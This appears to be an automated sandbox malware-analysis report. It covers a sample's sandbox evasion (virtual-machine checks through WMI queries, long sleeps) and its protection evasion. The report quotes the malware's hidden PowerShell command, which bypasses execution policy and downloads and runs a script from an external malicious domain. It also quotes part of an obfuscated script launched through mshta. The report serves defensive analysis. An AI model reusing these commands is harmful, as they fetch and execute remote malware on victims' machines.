Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Query firmware table information (likely to detect VMs)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: FirmwareTableInformation
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1747
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7641
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2051
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7782
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 4412 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924 Thread sleep count: 1747 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6924 Thread sleep count: 7641 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6268 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep count: 2051 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7552 Thread sleep count: 7782 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1980 Thread sleep time: -90000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7312 Thread sleep time: -60000s >= -30000s
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Encrypted powershell cmdline option found
Source: C:\Windows\System32\mshta.exe Process created: Base64 decoded $nMq5LiObPXHWFHldk9PS1OGyR43IcwrXZdOMbFNKTQ = $fALsE$zFQPaqsw6zu2eh5JcNHZhlyocZhWZ1jk4bKQctkmaXilCz2psLLjLzuckbTtyEEVrHym2chEBuQ7cydN = $TRUe$kMIbwIS8Tq3660kan2CYFMcdWeNBW1wYVuzoCbZ66yrnWeuw9MDIwDgeSKd5pY1GYiHWgEWLyQR8d2Jo7TkMQcM3k3oER7hsZNNs8O3NCb3APNj4MlFSelwMtSizBXiQpPcVkxtHQYCUCW2SIwHPGlYpKtuGdJcKaX666ngrS86DvEDg0eDGsqRHxdgm6NEqOkc6G7GDQDFvupBGqv4j5ElpyPv0qcN7Z5guweLDUuUrPql = $nULL$mdAMYmUEbbpxBWYAasZmNSW7OLJArePHXHTTQ5s6MqqnwwE0peWGeZMoNtJ3FR7SxuYcqsdjsbbmkixPzgfjSnJ9AFWEYKLEYYrLBCedX4dKnIZFwwbhADVsMObluX8RYEIaLOqMCPHwDuYxTO4t2HmlzFycMmH18cGzJZgI5sxSnyef6nyptKev5AX5RwB4dkqEIMfQW3tGCRVMOpE4GtiAymB6f3cdr7BMQPGimYbdRmPV5ARYhbSg7zoKTtNgIIEIHncZV204sNURdbN9cWWQKuMpjqmhymGcQw0C7uuTQrG01Ff2Xz ="Defla" + "teStream";$d1OBxL17U144VQli9d9QOL75zT03xHILbkzdg9X5AXcE1x0Pu8UQ9TbmEV9bTaXFcO82xU7lwnVSsQ2s8EhdgDiZkO7Sgz0ORNzSsZ7AjBTZId8bQ8B5Q6OsRle6dHQkZpLyqrpiuMmXQRWYFl8EolIWQt5pgMj6YupRcD9x6SMX1sZ3T5nF9z6uLlcJ9GEiTZ9aTL8f5qbYLgj2Ryn9ijNtnxTrmsQcqg1VZkPhVhd5worNvn25fXXOaSw1jWGAkjd4LzwOnldpjDd1KShXd7oSY7NPxyULs7gF9eqcSOn92fcfIQyFzKewaHrxIQofODeLbYCtqLisaFMcQzCltkdm3R9MOpl = "Compre" + "ssion"; $1psJbjhOhuL6VmxZBo3NEB9tYRkTeLkMUI4dj06lmRLFJ7NLmbHI6QSP2g520PuNhCkeLd48PwTUlARm8N2SeaiVXfd2JjauwWjW34suQavdDbREc1aN6tVi8XvH2wbNGO15GZK32q6kL1ZOaQcCMkUeg8jsgjyzoZFFFpzRyIxxFuaDwBu1gQtOrhVXeL9nKiMYWHFPYWQDi7XUojHckscvdTSkWORLXQsnLHhq1rBnmBDqyhtKPkF0MBhIUB4zlkMHTSDVLCOy56Xm6g6ZsmXAsz4VpMW31NGoSkR9qsQeJyRv4JR3NQbcJMXhiaR5izxkw4LXSyH97epHdRHHh5C2hxrrnBY5lIbjdL4doY0u9hGguYw6bYmjTMxzFDg5nP8A
Source: C:\Windows\System32\mshta.exe Process created: Base64 decoded $nMq5LiObPXHWFHldk9PS1OGyR43IcwrXZdOMbFNKTQ = $fALsE$zFQPaqsw6zu2eh5JcNHZhlyocZhWZ1jk4bKQctkmaXilCz2psLLjLzuckbTtyEEVrHym2chEBuQ7cydN = $TRUe$kMIbwIS8Tq3660kan2CYFMcdWeNBW1wYVuzoCbZ66yrnWeuw9MDIwDgeSKd5pY1GYiHWgEWLyQR8d2Jo7TkMQcM3k3oER7hsZNNs8O3NCb3APNj4MlFSelwMtSizBXiQpPcVkxtHQYCUCW2SIwHPGlYpKtuGdJcKaX666ngrS86DvEDg0eDGsqRHxdgm6NEqOkc6G7GDQDFvupBGqv4j5ElpyPv0qcN7Z5guweLDUuUrPql = $nULL$mdAMYmUEbbpxBWYAasZmNSW7OLJArePHXHTTQ5s6MqqnwwE0peWGeZMoNtJ3FR7SxuYcqsdjsbbmkixPzgfjSnJ9AFWEYKLEYYrLBCedX4dKnIZFwwbhADVsMObluX8RYEIaLOqMCPHwDuYxTO4t2HmlzFycMmH18cGzJZgI5sxSnyef6nyptKev5AX5RwB4dkqEIMfQW3tGCRVMOpE4GtiAymB6f3cdr7BMQPGimYbdRmPV5ARYhbSg7zoKTtNgIIEIHncZV204sNURdbN9cWWQKuMpjqmhymGcQw0C7uuTQrG01Ff2Xz ="Defla" + "teStream";$d1OBxL17U144VQli9d9QOL75zT03xHILbkzdg9X5AXcE1x0Pu8UQ9TbmEV9bTaXFcO82xU7lwnVSsQ2s8EhdgDiZkO7Sgz0ORNzSsZ7AjBTZId8bQ8B5Q6OsRle6dHQkZpLyqrpiuMmXQRWYFl8EolIWQt5pgMj6YupRcD9x6SMX1sZ3T5nF9z6uLlcJ9GEiTZ9aTL8f5qbYLgj2Ryn9ijNtnxTrmsQcqg1VZkPhVhd5worNvn25fXXOaSw1jWGAkjd4LzwOnldpjDd1KShXd7oSY7NPxyULs7gF9eqcSOn92fcfIQyFzKewaHrxIQofODeLbYCtqLisaFMcQzCltkdm3R9MOpl = "Compre" + "ssion"; $1psJbjhOhuL6VmxZBo3NEB9tYRkTeLkMUI4dj06lmRLFJ7NLmbHI6QSP2g520PuNhCkeLd48PwTUlARm8N2SeaiVXfd2JjauwWjW34suQavdDbREc1aN6tVi8XvH2wbNGO15GZK32q6kL1ZOaQcCMkUeg8jsgjyzoZFFFpzRyIxxFuaDwBu1gQtOrhVXeL9nKiMYWHFPYWQDi7XUojHckscvdTSkWORLXQsnLHhq1rBnmBDqyhtKPkF0MBhIUB4zlkMHTSDVLCOy56Xm6g6ZsmXAsz4VpMW31NGoSkR9qsQeJyRv4JR3NQbcJMXhiaR5izxkw4LXSyH97epHdRHHh5C2hxrrnBY5lIbjdL4doY0u9hGguYw6bYmjTMxzFDg5nP8A
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc 